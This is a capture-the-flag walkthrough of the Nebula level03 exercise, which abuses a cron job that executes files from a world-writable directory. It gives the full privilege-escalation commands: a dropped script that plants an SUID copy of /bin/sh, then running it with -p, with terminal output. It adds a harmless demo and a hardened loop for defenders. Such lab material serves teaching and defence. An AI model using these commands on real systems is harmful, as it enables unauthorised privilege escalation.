Level 03
Exploiting a vulnerable cron job that blindly executes scripts in a writable directory.
Description
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.
Approach
Upon inspecting the /home/flag03 directory, we see a script named writable.sh and a directory named writable.d. The directory writable.d is fully readable, writable, and executable by anyone (drwxrwxrwx).
Let’s take a look at the writable.sh script:
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
This script, run regularly by cron as the flag03 user, loops over every file in writable.d/, executes each one with bash (so the payload does not even need an execute bit), and then deletes it. Because writable.d/ is world-writable, any script we drop there will be executed as flag03 on the next cron run.
- We write a payload script in /home/flag03/writable.d/. The payload copies the /bin/sh binary to /home/flag03/uflag and sets the SUID bit on the copy, so once cron has run it as flag03 we have a shell with flag03's effective uid available whenever we want:
level03@nebula:/home/flag03$ echo 'cp /bin/sh /home/flag03/uflag ; chmod u+s /home/flag03/uflag' > writable.d/exp
level03@nebula:/home/flag03$ chmod +x writable.d/exp
- We wait a couple of minutes for the cron job to execute.
- Once the cron job runs, it executes our script (and deletes it afterwards), leaving the SUID shell uflag in /home/flag03.
- We execute the SUID shell with the -p flag: ./uflag -p. The uflag-4.2$ prompt in the output shows that /bin/sh is bash here, and bash drops its effective uid back to the real uid at startup unless -p is given, so without the flag we would be back to level03.
- We run getflag to complete the level.
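To make the execute-then-delete behaviour concrete without waiting for cron, here is an added bash example (not code from the level or from this writeup) that reproduces the writable.sh loop against a throwaway directory and places a checked variant beside it. The directory layout, the marker-file stand-in for the payload and the helper names are constructed for the demonstration; the checked loop assumes GNU stat.

```bash
#!/bin/bash
# Added example, not part of the original writeup: reproduces the pattern of
# /home/flag03/writable.sh against a scratch directory so the behaviour can be
# watched without waiting for cron, and contrasts it with a checked variant.
# All paths and file names here are constructed for the demonstration.

# Vulnerable variant: same loop as writable.sh. Every entry in the directory is
# handed to bash and then removed, regardless of who created it.
run_writable_loop() {
  local dir="$1" i
  for i in "$dir"/*; do
    [ -e "$i" ] || continue                  # empty directory: glob did not expand
    (ulimit -t 5; bash -x "$i") 2>/dev/null  # -x trace goes to stderr; silenced here
    rm -f -- "$i"
  done
}

# Checked variant: refuse anything that is not a regular file owned by the
# invoking user with no group/world write bits. Rejected files are still
# removed so the drop directory does not fill up.
run_checked_loop() {
  local dir="$1" i owner mode
  for i in "$dir"/*; do
    [ -e "$i" ] || continue
    if [ -L "$i" ] || [ ! -f "$i" ]; then
      rm -f -- "$i"; continue                # symlinks and non-regular files are never run
    fi
    owner=$(stat -c %u -- "$i")              # GNU stat: numeric owner uid
    mode=$(stat -c %a -- "$i")               # GNU stat: octal permission bits
    if [ "$owner" = "$(id -u)" ] && [ $(( 8#$mode & 8#022 )) -eq 0 ]; then
      (ulimit -t 5; bash "$i")
    fi
    rm -f -- "$i"
  done
}

# Drops a constructed stand-in for the level's payload (it only touches a marker
# file instead of copying /bin/sh) into the directory, world-writable as an
# attacker-controlled drop typically is.
plant_payload() {
  local dir="$1" marker="$2"
  printf 'touch -- %q\n' "$marker" > "$dir/exp"
  chmod 666 "$dir/exp"
}

# Runs both loops against the planted payload and reports whether each executed
# it. Prints "1 0": the writable.sh loop runs the drop, the checked loop does not.
# Note: in a single-user test the owner check cannot fail (we own our own files);
# it is the mode check that rejects the file here. On the real box the planted
# file is owned by level03, not flag03, and the owner check alone would stop it.
demo() {
  local work marker vuln_ran=0 hard_ran=0
  work=$(mktemp -d)
  marker="$work/marker"
  mkdir "$work/writable.d"

  plant_payload "$work/writable.d" "$marker"
  run_writable_loop "$work/writable.d"
  [ -e "$marker" ] && vuln_ran=1
  rm -f -- "$marker"

  plant_payload "$work/writable.d" "$marker"
  run_checked_loop "$work/writable.d"
  [ -e "$marker" ] && hard_ran=1

  rm -rf -- "$work"
  echo "$vuln_ran $hard_ran"
}
```

Source the file and call demo; it prints 1 0. The defender-side lesson is the one the level teaches: a cron job must never execute files from a directory other users can write to, and if it has to consume a drop directory it needs to verify owner, type and mode before running anything, ideally after moving the file into a location the submitter cannot touch.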
Output
level03@nebula:/home/flag03$ echo 'cp /bin/sh /home/flag03/uflag ; chmod u+s /home/flag03/uflag' > writable.d/exp
level03@nebula:/home/flag03$ chmod +x writable.d/exp
level03@nebula:/home/flag03$ ls
flagged writable.d writable.sh
... (wait for cron) ...
level03@nebula:/home/flag03$ ls
flagged uflag writable.d writable.sh
level03@nebula:/home/flag03$ ./uflag -p
uflag-4.2$ id
uid=1004(level03) gid=1004(level03) euid=996(flag03) groups=996(flag03),1004(level03)
uflag-4.2$ getflag
You have successfully executed getflag on a target account